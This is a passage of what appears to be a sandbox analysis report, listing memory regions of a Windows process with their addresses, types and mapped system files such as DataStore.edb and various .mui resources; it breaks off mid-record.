Region: id = 1478 start_va = 0x570000 end_va = 0x570fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usocore.dll.mui" filename = "\\Windows\\System32\\en-US\\usocore.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\usocore.dll.mui") Region: id = 1479 start_va = 0x580000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1480 start_va = 0x640000 end_va = 0x640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1481 start_va = 0x650000 end_va = 0x650fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1482 start_va = 0x660000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 1483 start_va = 0x6e0000 end_va = 0x6e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 1484 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 1485 start_va = 0x700000 end_va = 0x706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 1486 start_va = 0x710000 end_va = 0x752fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 1487 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 1488 start_va = 0x770000 end_va = 0x770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1489 start_va = 0x780000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 1490 start_va = 0x790000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 1491 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 1492 start_va = 0x7b0000 end_va = 0x7b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 1493 start_va = 0x7c0000 end_va = 0x7c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1494 start_va = 0x7d0000 end_va = 0x7d6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 1495 start_va = 0x7e0000 end_va = 0x7e3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1496 start_va = 0x7f0000 end_va = 0x7f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 1497 start_va = 0x800000 end_va = 0x8fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000800000" filename = "" Region: id = 1498 start_va = 0x900000 end_va = 0xa87fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 1499 start_va = 0xa90000 end_va = 0xc10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1500 start_va = 0xc20000 end_va = 0x101afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c20000" filename = "" Region: id = 1501 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1502 start_va = 0x10a0000 end_va = 0x10a1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "activeds.dll.mui" filename = "\\Windows\\System32\\en-US\\activeds.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\activeds.dll.mui") Region: id = 1503 start_va = 0x10b0000 end_va = 0x10b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1504 start_va = 0x10c0000 end_va = 0x10c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 1505 start_va = 0x10d0000 end_va = 0x10d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "newdev.dll.mui" filename = "\\Windows\\System32\\en-US\\newdev.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\newdev.dll.mui") Region: id = 1506 start_va = 0x10e0000 end_va = 0x10e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 1507 start_va = 0x10f0000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010f0000" filename = "" Region: id = 1508 start_va = 0x11f0000 end_va = 0x11f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 1509 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 1510 start_va = 0x1300000 end_va = 0x13fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1511 start_va = 0x1400000 end_va = 0x1736fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1512 start_va = 0x1740000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 1513 start_va = 0x17c0000 end_va = 0x17cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1514 start_va = 0x17d0000 end_va = 0x17dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1515 start_va = 0x17e0000 end_va = 0x17e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 1516 start_va = 0x17f0000 end_va = 0x183dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000017f0000" filename = "" Region: id = 1517 start_va = 0x1840000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 1518 start_va = 0x1940000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1519 start_va = 0x19c0000 end_va = 0x19c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019c0000" filename = "" Region: id = 1520 start_va = 0x19d0000 end_va = 0x19d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 1521 start_va = 0x19e0000 end_va = 0x19effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 1522 start_va = 0x19f0000 end_va = 0x19f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 1523 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1524 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 1525 start_va = 0x1c00000 end_va = 0x1cdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1526 start_va = 0x1ce0000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ce0000" filename = "" Region: id = 1527 start_va = 0x1d00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 1528 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1529 start_va = 0x1f00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Region: id = 1530 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1531 start_va = 0x2100000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 1532 start_va = 0x2200000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1533 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 1534 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 1535 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 1536 start_va = 0x2600000 end_va = 0x26fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002600000" filename = "" Region: id = 1537 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 1538 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 1539 start_va = 0x2900000 end_va = 0x2944fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1540 start_va = 0x2950000 end_va = 0x29ddfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1541 start_va = 0x29e0000 end_va = 0x2adffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029e0000" filename = "" Region: id = 1542 start_va = 0x2ae0000 end_va = 0x2ae1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 1543 start_va = 0x2af0000 end_va = 0x2afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1544 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 1545 start_va = 0x2c00000 end_va = 0x2c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 1546 start_va = 0x2c80000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c80000" filename = "" Region: id = 1547 start_va = 0x2d00000 end_va = 0x2d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 1548 start_va = 0x2d80000 end_va = 0x2d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d80000" filename = "" Region: id = 1549 start_va = 0x2d90000 end_va = 0x2d9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d90000" filename = "" Region: id = 1550 start_va = 0x2da0000 end_va = 0x2daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 1551 start_va = 0x2db0000 end_va = 0x2dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002db0000" filename = "" Region: id = 1552 start_va = 0x2dc0000 end_va = 0x2dc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dc0000" filename = "" Region: id = 1553 start_va = 0x2dd0000 end_va = 0x2ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002dd0000" filename = "" Region: id = 1554 start_va = 0x2de0000 end_va = 0x2deffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1555 start_va = 0x2df0000 end_va = 0x2dfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1556 start_va = 0x2e00000 end_va = 0x2efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e00000" filename = "" Region: id = 1557 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 1558 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1559 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 1560 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 1561 start_va = 0x3300000 end_va = 0x337ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1562 start_va = 0x3380000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 1563 start_va = 0x3480000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 1564 start_va = 0x3500000 end_va = 0x350ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003500000" filename = "" Region: id = 1565 start_va = 0x3510000 end_va = 0x351ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003510000" filename = "" Region: id = 1566 start_va = 0x3520000 end_va = 0x352ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003520000" filename = "" Region: id = 1567 start_va = 0x3530000 end_va = 0x353ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003530000" filename = "" Region: id = 1568 start_va = 0x3540000 end_va = 0x354ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003540000" filename = "" Region: id = 1569 start_va = 0x3550000 end_va = 0x355ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003550000" filename = "" Region: id = 1570 start_va = 0x3560000 end_va = 0x3566fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 1571 start_va = 0x3570000 end_va = 0x35effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 1572 start_va = 0x35f0000 end_va = 0x36effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 1573 start_va = 0x36f0000 end_va = 0x36f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036f0000" filename = "" Region: id = 1574 start_va = 0x3700000 end_va = 0x3706fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003700000" filename = "" Region: id = 1575 start_va = 0x3710000 end_va = 0x378ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003710000" filename = "" Region: id = 1576 start_va = 0x3790000 end_va = 0x37ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 1577 start_va = 0x37e0000 end_va = 0x37effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1578 start_va = 0x37f0000 end_va = 0x37fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1579 start_va = 0x3800000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 1580 start_va = 0x3900000 end_va = 0x397ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003900000" filename = "" Region: id = 1581 start_va = 0x3980000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003980000" filename = "" Region: id = 1582 start_va = 0x3a80000 end_va = 0x3b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a80000" filename = "" Region: id = 1583 start_va = 0x3b80000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b80000" filename = "" Region: id = 1584 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 1585 start_va = 0x3c80000 end_va = 0x3cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c80000" filename = "" Region: id = 1586 start_va = 0x3d00000 end_va = 0x3d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d00000" filename = "" Region: id = 1587 start_va = 0x3d80000 end_va = 0x3e7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d80000" filename = "" Region: id = 1588 start_va = 0x3e80000 end_va = 0x3f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1589 start_va = 0x3f80000 end_va = 0x407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f80000" filename = "" Region: id = 1590 start_va = 0x4080000 end_va = 0x417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1591 start_va = 0x4180000 end_va = 0x427ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004180000" filename = "" Region: id = 1592 start_va = 0x4280000 end_va = 0x437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004280000" filename = "" Region: id = 1593 start_va = 0x4380000 end_va = 0x438ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1594 start_va = 0x4390000 end_va = 0x439ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 1595 start_va = 0x43a0000 end_va = 0x43affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1596 start_va = 0x43b0000 end_va = 0x43b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043b0000" filename = "" Region: id = 1597 start_va = 0x43c0000 end_va = 0x43cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1598 start_va = 0x43d0000 end_va = 0x43dffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1599 start_va = 0x43e0000 end_va = 0x43effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1600 start_va = 0x43f0000 end_va = 0x43fffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1601 start_va = 0x4400000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1602 start_va = 0x4500000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1603 start_va = 0x4600000 end_va = 0x46fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 1604 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1605 start_va = 0x4800000 end_va = 0x48fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 1606 start_va = 0x4900000 end_va = 0x49fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 1607 start_va = 0x4a00000 end_va = 0x4a0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a00000" filename = "" Region: id = 1608 start_va = 0x4a10000 end_va = 0x4a1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a10000" filename = "" Region: id = 1609 start_va = 0x4a20000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a20000" filename = "" Region: id = 1610 start_va = 0x4a30000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a30000" filename = "" Region: id = 1611 start_va = 0x4a40000 end_va = 0x4a4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a40000" filename = "" Region: id = 1612 start_va = 0x4a50000 end_va = 0x4a5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a50000" filename = "" Region: id = 1613 start_va = 0x4a60000 end_va = 0x4a6ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1614 start_va = 0x4a70000 end_va = 0x4a7ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1615 start_va = 0x4a80000 end_va = 0x4a8ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1616 start_va = 0x4a90000 end_va = 0x4a9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1617 start_va = 0x4aa0000 end_va = 0x4aaffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1618 start_va = 0x4ab0000 end_va = 0x4abffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1619 start_va = 0x4ac0000 end_va = 0x4acffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1620 start_va = 0x4ad0000 end_va = 0x4adffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1621 start_va = 0x4ae0000 end_va = 0x4aeffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1622 start_va = 0x4af0000 end_va = 0x4afffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1623 start_va = 0x4b00000 end_va = 0x4bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 1624 start_va = 0x4c00000 end_va = 0x4cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c00000" filename = "" Region: id = 1625 start_va = 0x4d00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004d00000" filename = "" Region: id = 1626 start_va = 0x4e00000 end_va = 0x4efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e00000" filename = "" Region: id = 1627 start_va = 0x4f00000 end_va = 0x4ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f00000" filename = "" Region: id = 1628 start_va = 0x5000000 end_va = 0x50fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 1629 start_va = 0x5100000 end_va = 0x51fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005100000" filename = "" Region: id = 1630 start_va = 0x5200000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005200000" filename = "" Region: id = 1631 start_va = 0x5300000 end_va = 0x53fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005300000" filename = "" Region: id = 1632 start_va = 0x5400000 end_va = 0x54fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005400000" filename = "" Region: id = 1633 start_va = 0x5500000 end_va = 0x55fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005500000" filename = "" Region: id = 1634 start_va = 0x5600000 end_va = 0x56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1635 start_va = 0x5700000 end_va = 0x57fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1636 start_va = 0x5800000 end_va = 0x58fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1637 start_va = 0x5900000 end_va = 0x59fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005900000" filename = "" Region: id = 1638 start_va = 0x5a00000 end_va = 0x5a0ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1639 start_va = 0x5a10000 end_va = 0x5a1ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1640 start_va = 0x5a20000 end_va = 0x5a2ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1641 start_va = 0x5a30000 end_va = 0x5a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1642 start_va = 0x5a40000 end_va = 0x5a46fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005a40000" filename = "" Region: id = 1643 start_va = 